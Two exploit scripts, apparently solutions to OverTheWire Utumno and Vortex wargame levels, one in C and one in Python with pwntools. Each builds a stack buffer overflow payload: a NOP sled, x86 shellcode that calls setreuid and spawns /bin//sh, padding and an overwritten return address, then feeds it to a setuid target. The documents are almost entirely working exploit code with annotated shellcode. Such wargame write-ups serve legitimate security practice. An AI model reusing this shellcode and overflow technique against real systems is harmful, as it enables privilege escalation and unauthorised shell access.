File: overthewire/utumno/scripts/level3/level3.c
#include<stdio.h>
#include<unistd.h>

#define PATH "/utumno/utumno2"
#define POSISTION 16

#define SHELLCODE "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x6a\x31\x58\xcd\x80\x89\xc3\x89\xd9\x6a\x46\x58\xcd\x80\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\x6a\x01\x58\xcd\x80"

int main() {
    char payload[POSISTION+4];
    int value = 0xffffdf87;

    for(int i=0;i<POSISTION;i++)
        payload[i] = 'A';

    *((int*)(payload + POSISTION)) = value;

    // Print the payload as a hex dump
    for (int i = 0; i < POSISTION+4; i++) {
        printf("\\x%02x", (unsigned char)payload[i]);
    }
    printf("\n");
    char *args[] = {NULL};
    char *envp[] = {"1","2","3","4","5","6","7",SHELLCODE,payload,NULL};
    execve(PATH, args, envp);
    return 0;
}

File: docs/overthewire/vortex/scripts/level3/level3.py
#!/usr/bin/python3
from pwn import *
import sys


address_of_jump_exit = 0x08049052

shellcode = (
    b"\x6a\x31"  # push 0x31 (49)
    b"\x58"      # pop eax
    b"\xcd\x80"  # int 0x80 (geteuid())

    b"\x89\xc3"  # mov ebx, eax (uid)
    b"\x89\xd9"  # mov ecx, ebx
    b"\x6a\x46"  # push 0x46 (70)
    b"\x58"      # pop eax
    b"\xcd\x80"  # int 0x80, setreuid(geteuid(), geteuid())

    b"\x31\xd2"  # xor edx, edx
    b"\x52"      # push edx, which is \0
    b"\x68\x2f\x2f\x73\x68"  # push "//sh"
    b"\x68\x2f\x62\x69\x6e"  # push "/bin"
    b"\x89\xe3"  # mov ebx, esp (now ebx contains: "/bin//sh",\x00)

    b"\x52"      # push edx (push NULL into stack)
    b"\x53"      # push ebx (push pathname)
    b"\x89\xe1"  # mov ecx, esp (ecx is argv)

    b"\xb0\x0b"  # mov al, 0x0b (11)
    b"\xcd\x80"  # int 0x80 (execv("/bin//sh", argv))

        # mv eax, 1         ; system call number (sys_exit)
    b"\x6a\x01"  # push 1
    b"\x58"      # pop eax (sys_exit)
    # int 0x80
    b"\xcd\x80"  # int 0x80 (exit())
)

# Add NOP slide (\x90) before shellcode
nop_slide = b"\x90" * 50

shellcode = nop_slide + shellcode

# Create payload

payload = shellcode
payload += b'A' * (132 - len(payload))

payload += p32(address_of_jump_exit)

sys.stdout.buffer.write(payload)
